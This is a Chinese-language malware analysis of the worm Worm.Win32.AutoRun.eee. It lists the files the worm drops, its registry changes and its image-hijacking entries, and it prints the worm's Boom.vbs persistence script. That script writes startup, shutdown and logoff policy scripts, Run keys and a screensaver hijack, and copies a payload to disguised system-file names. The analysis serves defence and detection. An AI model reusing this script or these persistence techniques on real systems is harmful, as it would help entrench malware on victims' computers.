Worm.Win32.AutoRun.eee的行为分析
本地行为:
1、文件运行后会衍生以下文件:
%DriveLetter%\autorun.inf
%Temp%\~DF7634.tmp
%Temp%\~DF8840.tmp
%Temp%\~DF9A47.tmp
%DriveLetter%\MS-DOS.com
%Windir%\Cursors\Boom.vbs
%Windir%\Fonts\Fonts.exe
%Windir%\Fonts\tskmgr.exe
%Windir%\Media\rndll32.pif
%Windir%\pchealth\Global.exe
%Windir%\pchealth\helpctr\binaries\HelpHost.com
%Windir%\system\KEYBOARD.exe
%System32%\dllcache\autorun.inf
%System32%\dllcache\Default.exe
%System32%\dllcache\Global.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-
00AA002F954E}\Global.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-
00AA002F954E}\svchost.exe
%System32%\dllcache\Recycler.{645FF040-5081-101B-9F08-
00AA002F954E}\system.exe
%System32%\dllcache\rndll32.exe
%System32%\dllcache\svchost.exe
%System32%\dllcache\tskmgr.exe
%System32%\drivers\drivers.cab.exe
%System32%\regedit.exe
2、修改注册表:
HKEY_CURRENT_USER\Control Panel
\Desktop\SCRNSAVE.EXE
新: 字符串: C:\WINDOWS\pchealth\helpctr
\binaries\HelpHost.com
旧: 字符串: C:\WINDOWS\system32\logon.scr
描述:设置屏幕保护为病毒文件
HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion\Explorer
\Advanced\ShowSuperHidden
新: DWORD: 0 (0)
旧: DWORD: 1 (0x1)
描述:修改文件夹不可见隐藏文件
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
\MSCFile\Shell\Open\Command\@
新: 字符串: C:\WINDOWS\Fonts\Fonts.exe
旧: 字符串: %SystemRoot%\system32\mmc.exe %1
描述:修改在运行命令中输入mmc.exe时候运行病毒
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
\regfile\shell\open\command\@
新: 字符串: C:\WINDOWS\pchealth\Global.exe
旧: 字符串: regedit.exe %1
描述:修改在运行命令中输入regedit.exe时候运行病毒
HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion\RunOnce\@
键值: 字符串: C:\WINDOWS\system32\dllcache\Default.exe
描述:添加启动项
HKEY_CURRENT_USER\Software\Microsoft
\Windows\ShellNoRoam\MUICache\C:\WINDOWS
\system32\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\Global.exe
键值: 字符串: Global
描述:添加启动项
HKEY_CURRENT_USER\Software\Microsoft
\Windows\ShellNoRoam\MUICache\C:\WINDOWS
\system32\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\svchost.exe
键值: 字符串: svchost
描述:添加启动项
HKEY_CURRENT_USER\Software\Microsoft
\Windows\ShellNoRoam\MUICache\C:\WINDOWS
\system32\dllcache\Recycler.
{645FF040-5081-101B-9F08-00AA002F954E}\system.exe
键值: 字符串: system
描述:添加启动项
HKEY_CURRENT_USER\Software\Policies
\Microsoft\Windows\System\Scripts\Logoff\0\0\Script
键值: 字符串: C:\WINDOWS\Cursors\Boom.vbs
描述:系统注销时启动病毒脚本
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\auto.exe\Debugger
键值: 字符串: C:\WINDOWS\system32\drivers\drivers.cab.exe
描述:添加映像劫持项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\boot.exe\Debugger
键值: 字符串: C:\WINDOWS\Fonts\fonts.exe
描述:添加映像劫持项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\msconfig.exe\Debugger
键值: 字符串: C:\WINDOWS\Media\rndll32.pif
描述:添加映像劫持项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion
\Image File Execution Options\procexp.exe\Debugger
描述:添加映像劫持项
键值: 字符串: C:\WINDOWS\pchealth\helpctr
\binaries\HelpHost.com
描述:添加映像劫持项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows NT\CurrentVersion\Image File Execution Options
\taskmgr.exe\Debugger
键值: 字符串: C:\WINDOWS\Fonts\tskmgr.exe
描述:添加映像劫持项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\policies\Explorer\Run\sys
键值: 字符串: C:\WINDOWS\Fonts\Fonts.exe
描述:添加启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\@
键值: 字符串: C:\WINDOWS\system\KEYBOARD.exe
描述:添加启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\RunOnce\@
键值: 字符串: C:\WINDOWS\system32\dllcache\Default.exe
描述:添加启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
\Microsoft\Windows\System\Scripts
\Shutdown\0\0\Script
键值: 字符串: C:\WINDOWS\Cursors\Boom.vbs
描述:系统关闭时启动病毒脚本
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
\Microsoft\Windows\System\Scripts
\Startup\0\0\Script
键值: 字符串: C:\WINDOWS\Cursors\Boom.vbs
描述:系统启动时启动病毒脚本
3. 利用vbs脚本在中毒机器注销、关机、启动进行病毒文件复制及启动项的添加,Boom.vbs文件:
dim fs,rg
set fs = createobject(scripting.filesystemobject)
set rg = createobject(wscript.shell)
on error resume next
rg.regwrite HKCR\.vbs\, VBSFile
rg.regwrite HKCU\Control Panel\Desktop\SCRNSAVE.EXE,
C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com
rg.regwrite HKCU\Control Panel\Desktop\ScreenSaveTimeOut, 30
rg.regwrite HKCR\MSCFile\Shell\Open\Command\,
C:\WINDOWS\pchealth\Global.exe
rg.regwrite HKCR\regfile\Shell\Open\Command\,
C:\WINDOWS\pchealth\Global.exe
rg.regwrite HKLM\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunOnce\,
C:\WINDOWS\system32\dllcache\Default.exe
rg.regwrite HKCU\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunOnce\,
C:\WINDOWS\system32\dllcache\Default.exe
rg.regwrite HKLM\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run\,
C:\WINDOWS\system\KEYBOARD.exe
rg.regwrite HKEY_CLASSES_ROOT\MSCFile
\Shell\Open\Command\,
C:\WINDOWS\Fonts\Fonts.exe
rg.regwrite HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\DisplayName,
Local Group Policy
rg.regwrite HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\FileSysPath,
rg.regwrite HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\GPO-ID,LocalGPO
rg.regwrite HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\GPOName,Local Group Policy
rg.regwrite HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\SOM-ID,Local
rg.regwrite HKCU\Software\Policies\Microsoft
\Windows\System\Scripts\Logoff\0\0\Parameters,
rg.regwrite HKCU\Software\Policies\Microsoft\Windows\System
\Scripts\Logoff\0\0\Script,C:\WINDOWS\Cursors\Boom.vbs
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\DisplayName,
Local Group Policy
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\FileSysPath,
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\GPO-ID, LocalGPO
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\GPOName,
Local Group Policy
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\SOM-ID, Local
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\0\Parameters,
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Shutdown\0\0\Script,
C:\WINDOWS\Cursors\Boom.vbs
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\DisplayName,
Local Group Policy
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\FileSysPath,
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\GPO-ID, LocalGPO
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\GPOName,
Local Group Policy
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\SOM-ID, Local
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\0\Parameters,
rg.regwrite HKLM\Software\Policies\Microsoft
\Windows\System\Scripts\Startup\0\0\Script,
C:\WINDOWS\Cursors\Boom.vbs
If Not fs.fileexists(C:\WINDOWS\Fonts\Fonts.exe)
Then fs.copyfile (C:\WINDOWS\Help\microsoft.hlp),
(C:\WINDOWS\Fonts\Fonts.exe)
If Not fs.fileexists(C:\WINDOWS\pchealth\helpctr
\binaries\HelpHost.com) Then fs.copyfile
(C:\WINDOWS\Help\microsoft.hlp),
(C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com)
If Not fs.fileexists(C:\WINDOWS\pchealth\Global.exe)
Then fs.copyfile (C:\WINDOWS\Help\microsoft.hlp),
(C:\WINDOWS\pchealth\Global.exe)
If Not fs.fileexists(C:\WINDOWS\system\KEYBOARD.exe)
Then fs.copyfile (C:\WINDOWS\Help\microsoft.hlp),
(C:\WINDOWS\system\KEYBOARD.exe)
If Not fs.fileexists(C:\WINDOWS\system32\dllcache
\Default.exe) Then fs.copyfile
(C:\WINDOWS\Help\microsoft.hlp),
(C:\WINDOWS\system32\dllcache\Default.exe)
If Not fs.fileexists(C:\windows\system32
\drivers\drivers.cab.exe) Then fs.copyfile
(C:\WINDOWS\Help\microsoft.hlp),
(C:\windows\system32\drivers\drivers.cab.exe )
If Not fs.fileexists(C:\windows\media\rndll32.pif )
Then fs.copyfile (C:\WINDOWS\Help\microsoft.hlp),
(C:\windows\media\rndll32.pif)
If Not fs.fileexists(C:\windows\fonts\tskmgr.exe)
Then fs.copyfile (C:\WINDOWS\Help\microsoft.hlp),
(C:\windows\fonts\tskmgr.exe)
4. 启动方式多样化:
将系统默认屏幕保护程序%System32%\logon.scr替换成病毒文件%Windir%\pchealth\helpctr\binaries\HelpHost.com并修改屏幕保护启动时间为30s;在Logoff(注销)、Shutdown(关机)、Startup(启动)中加载病毒脚本%Windir% \Cursors\Boom.vbs,达到保持病毒文件和启动项的完整;修改注册在开机运行项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\Run、登陆用户运行项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\RunOnce、系统文件Explorer.exe文件加载项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\policies\Explorer\Run\sys,
添加了病毒文件的启动。
5. 双重文件隐藏方式:
病毒运行后将衍生文件设置成系统隐藏文件,并修改注册表,隐藏受保护的操作系统:
HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Explorer\Advanced\ShowSuperHidden设置为关;
病毒文件主要以.EXE与.COM为后缀名,
所以设置HKEY_LOCAL_MACHINE\SOFTWARE\Classes
\comfile\NeverShowExt、
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile
\NeverShowExt为关,即使启用系统受保护文件选项为开,
也是看不到病毒文件原型的。
6. 伪装技术加映像劫持:
该病毒将释放文件名设置成regedit.exe、svchost.exe、msconfig.exe、tskmgr.exe、HelpHost.com等来伪装成系统文件,使得用户无法分辨;劫持在运行命令(cmd.exe)中运行regedit.exe与mmc.exe运行病毒文件;映像劫持系统文件ctfmon.exe、msconfig.exe、taskmgr.exe、autorun.exe及系统辅助工具autoruns.exe、auto.exe,达到系统加载以上文件或是运行以上文件时就运行病毒。
7. 混淆视听:
该病毒衍生的文件图标为文件夹图标,误导用户,使用户认为该病毒是文件夹,导致误运行病毒文件;将系统文件%system32%\taskmgr.exe和%system32%\rundll32.exe复制到系统备份目录%System32%\dllcache下,并分别重命名为tskgr.exe和rndll32.pif;病毒衍生文件%Windir%\Fonts\tskmgr.exe、%Windir%\Media\rndll32.pif;以达到混淆视听的作用。
8. 保持计算机原有状态:
病毒通过修改注册表,进行开机关机优化设置,使得开关机速度提升,使计算机不会因为运行多个病毒文件拖慢系统,修改如下:
HKEY_CURRENT_USER\Control Panel\Desktop\AutoEndTasks
新: 字符串: 1
旧: 字符串:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg
\BootOptimizeFunction\LcnEndLocation
新: 字符串: 642218
旧: 字符串: 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg
\BootOptimizeFunction\LcnStartLocation
新: 字符串: 550001
旧: 字符串: 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg
\BootOptimizeFunction\OptimizeComplete
新: 字符串: Yes
旧: 字符串: No
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg
\BootOptimizeFunction\OptimizeError
新: 字符串:
旧: 字符串: Not Run
9. 进程互锁:
病毒完全运行后创建Global.exe、svchost.exe、system.exe进程,以达到进程互相保护。
注: %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的位置。
%Windir% WINDODWS所在目录
%DriveLetter% 逻辑驱动器根目录
%ProgramFiles% 系统程序默认安装目录
%HomeDrive% 当前启动的系统的所在分区
%Documents and Settings% 当前用户文档根目录
%Temp% \Documents and Settings\当前用户\Local Settings\Temp
%System32% 系统的 System32文件夹
Windows2000/NT中默认的安装路径是C:\Winnt\System32
windows95/98/me中默认的安装路径是C:\Windows\System
windowsXP中默认的安装路径是C:\Windows\System32
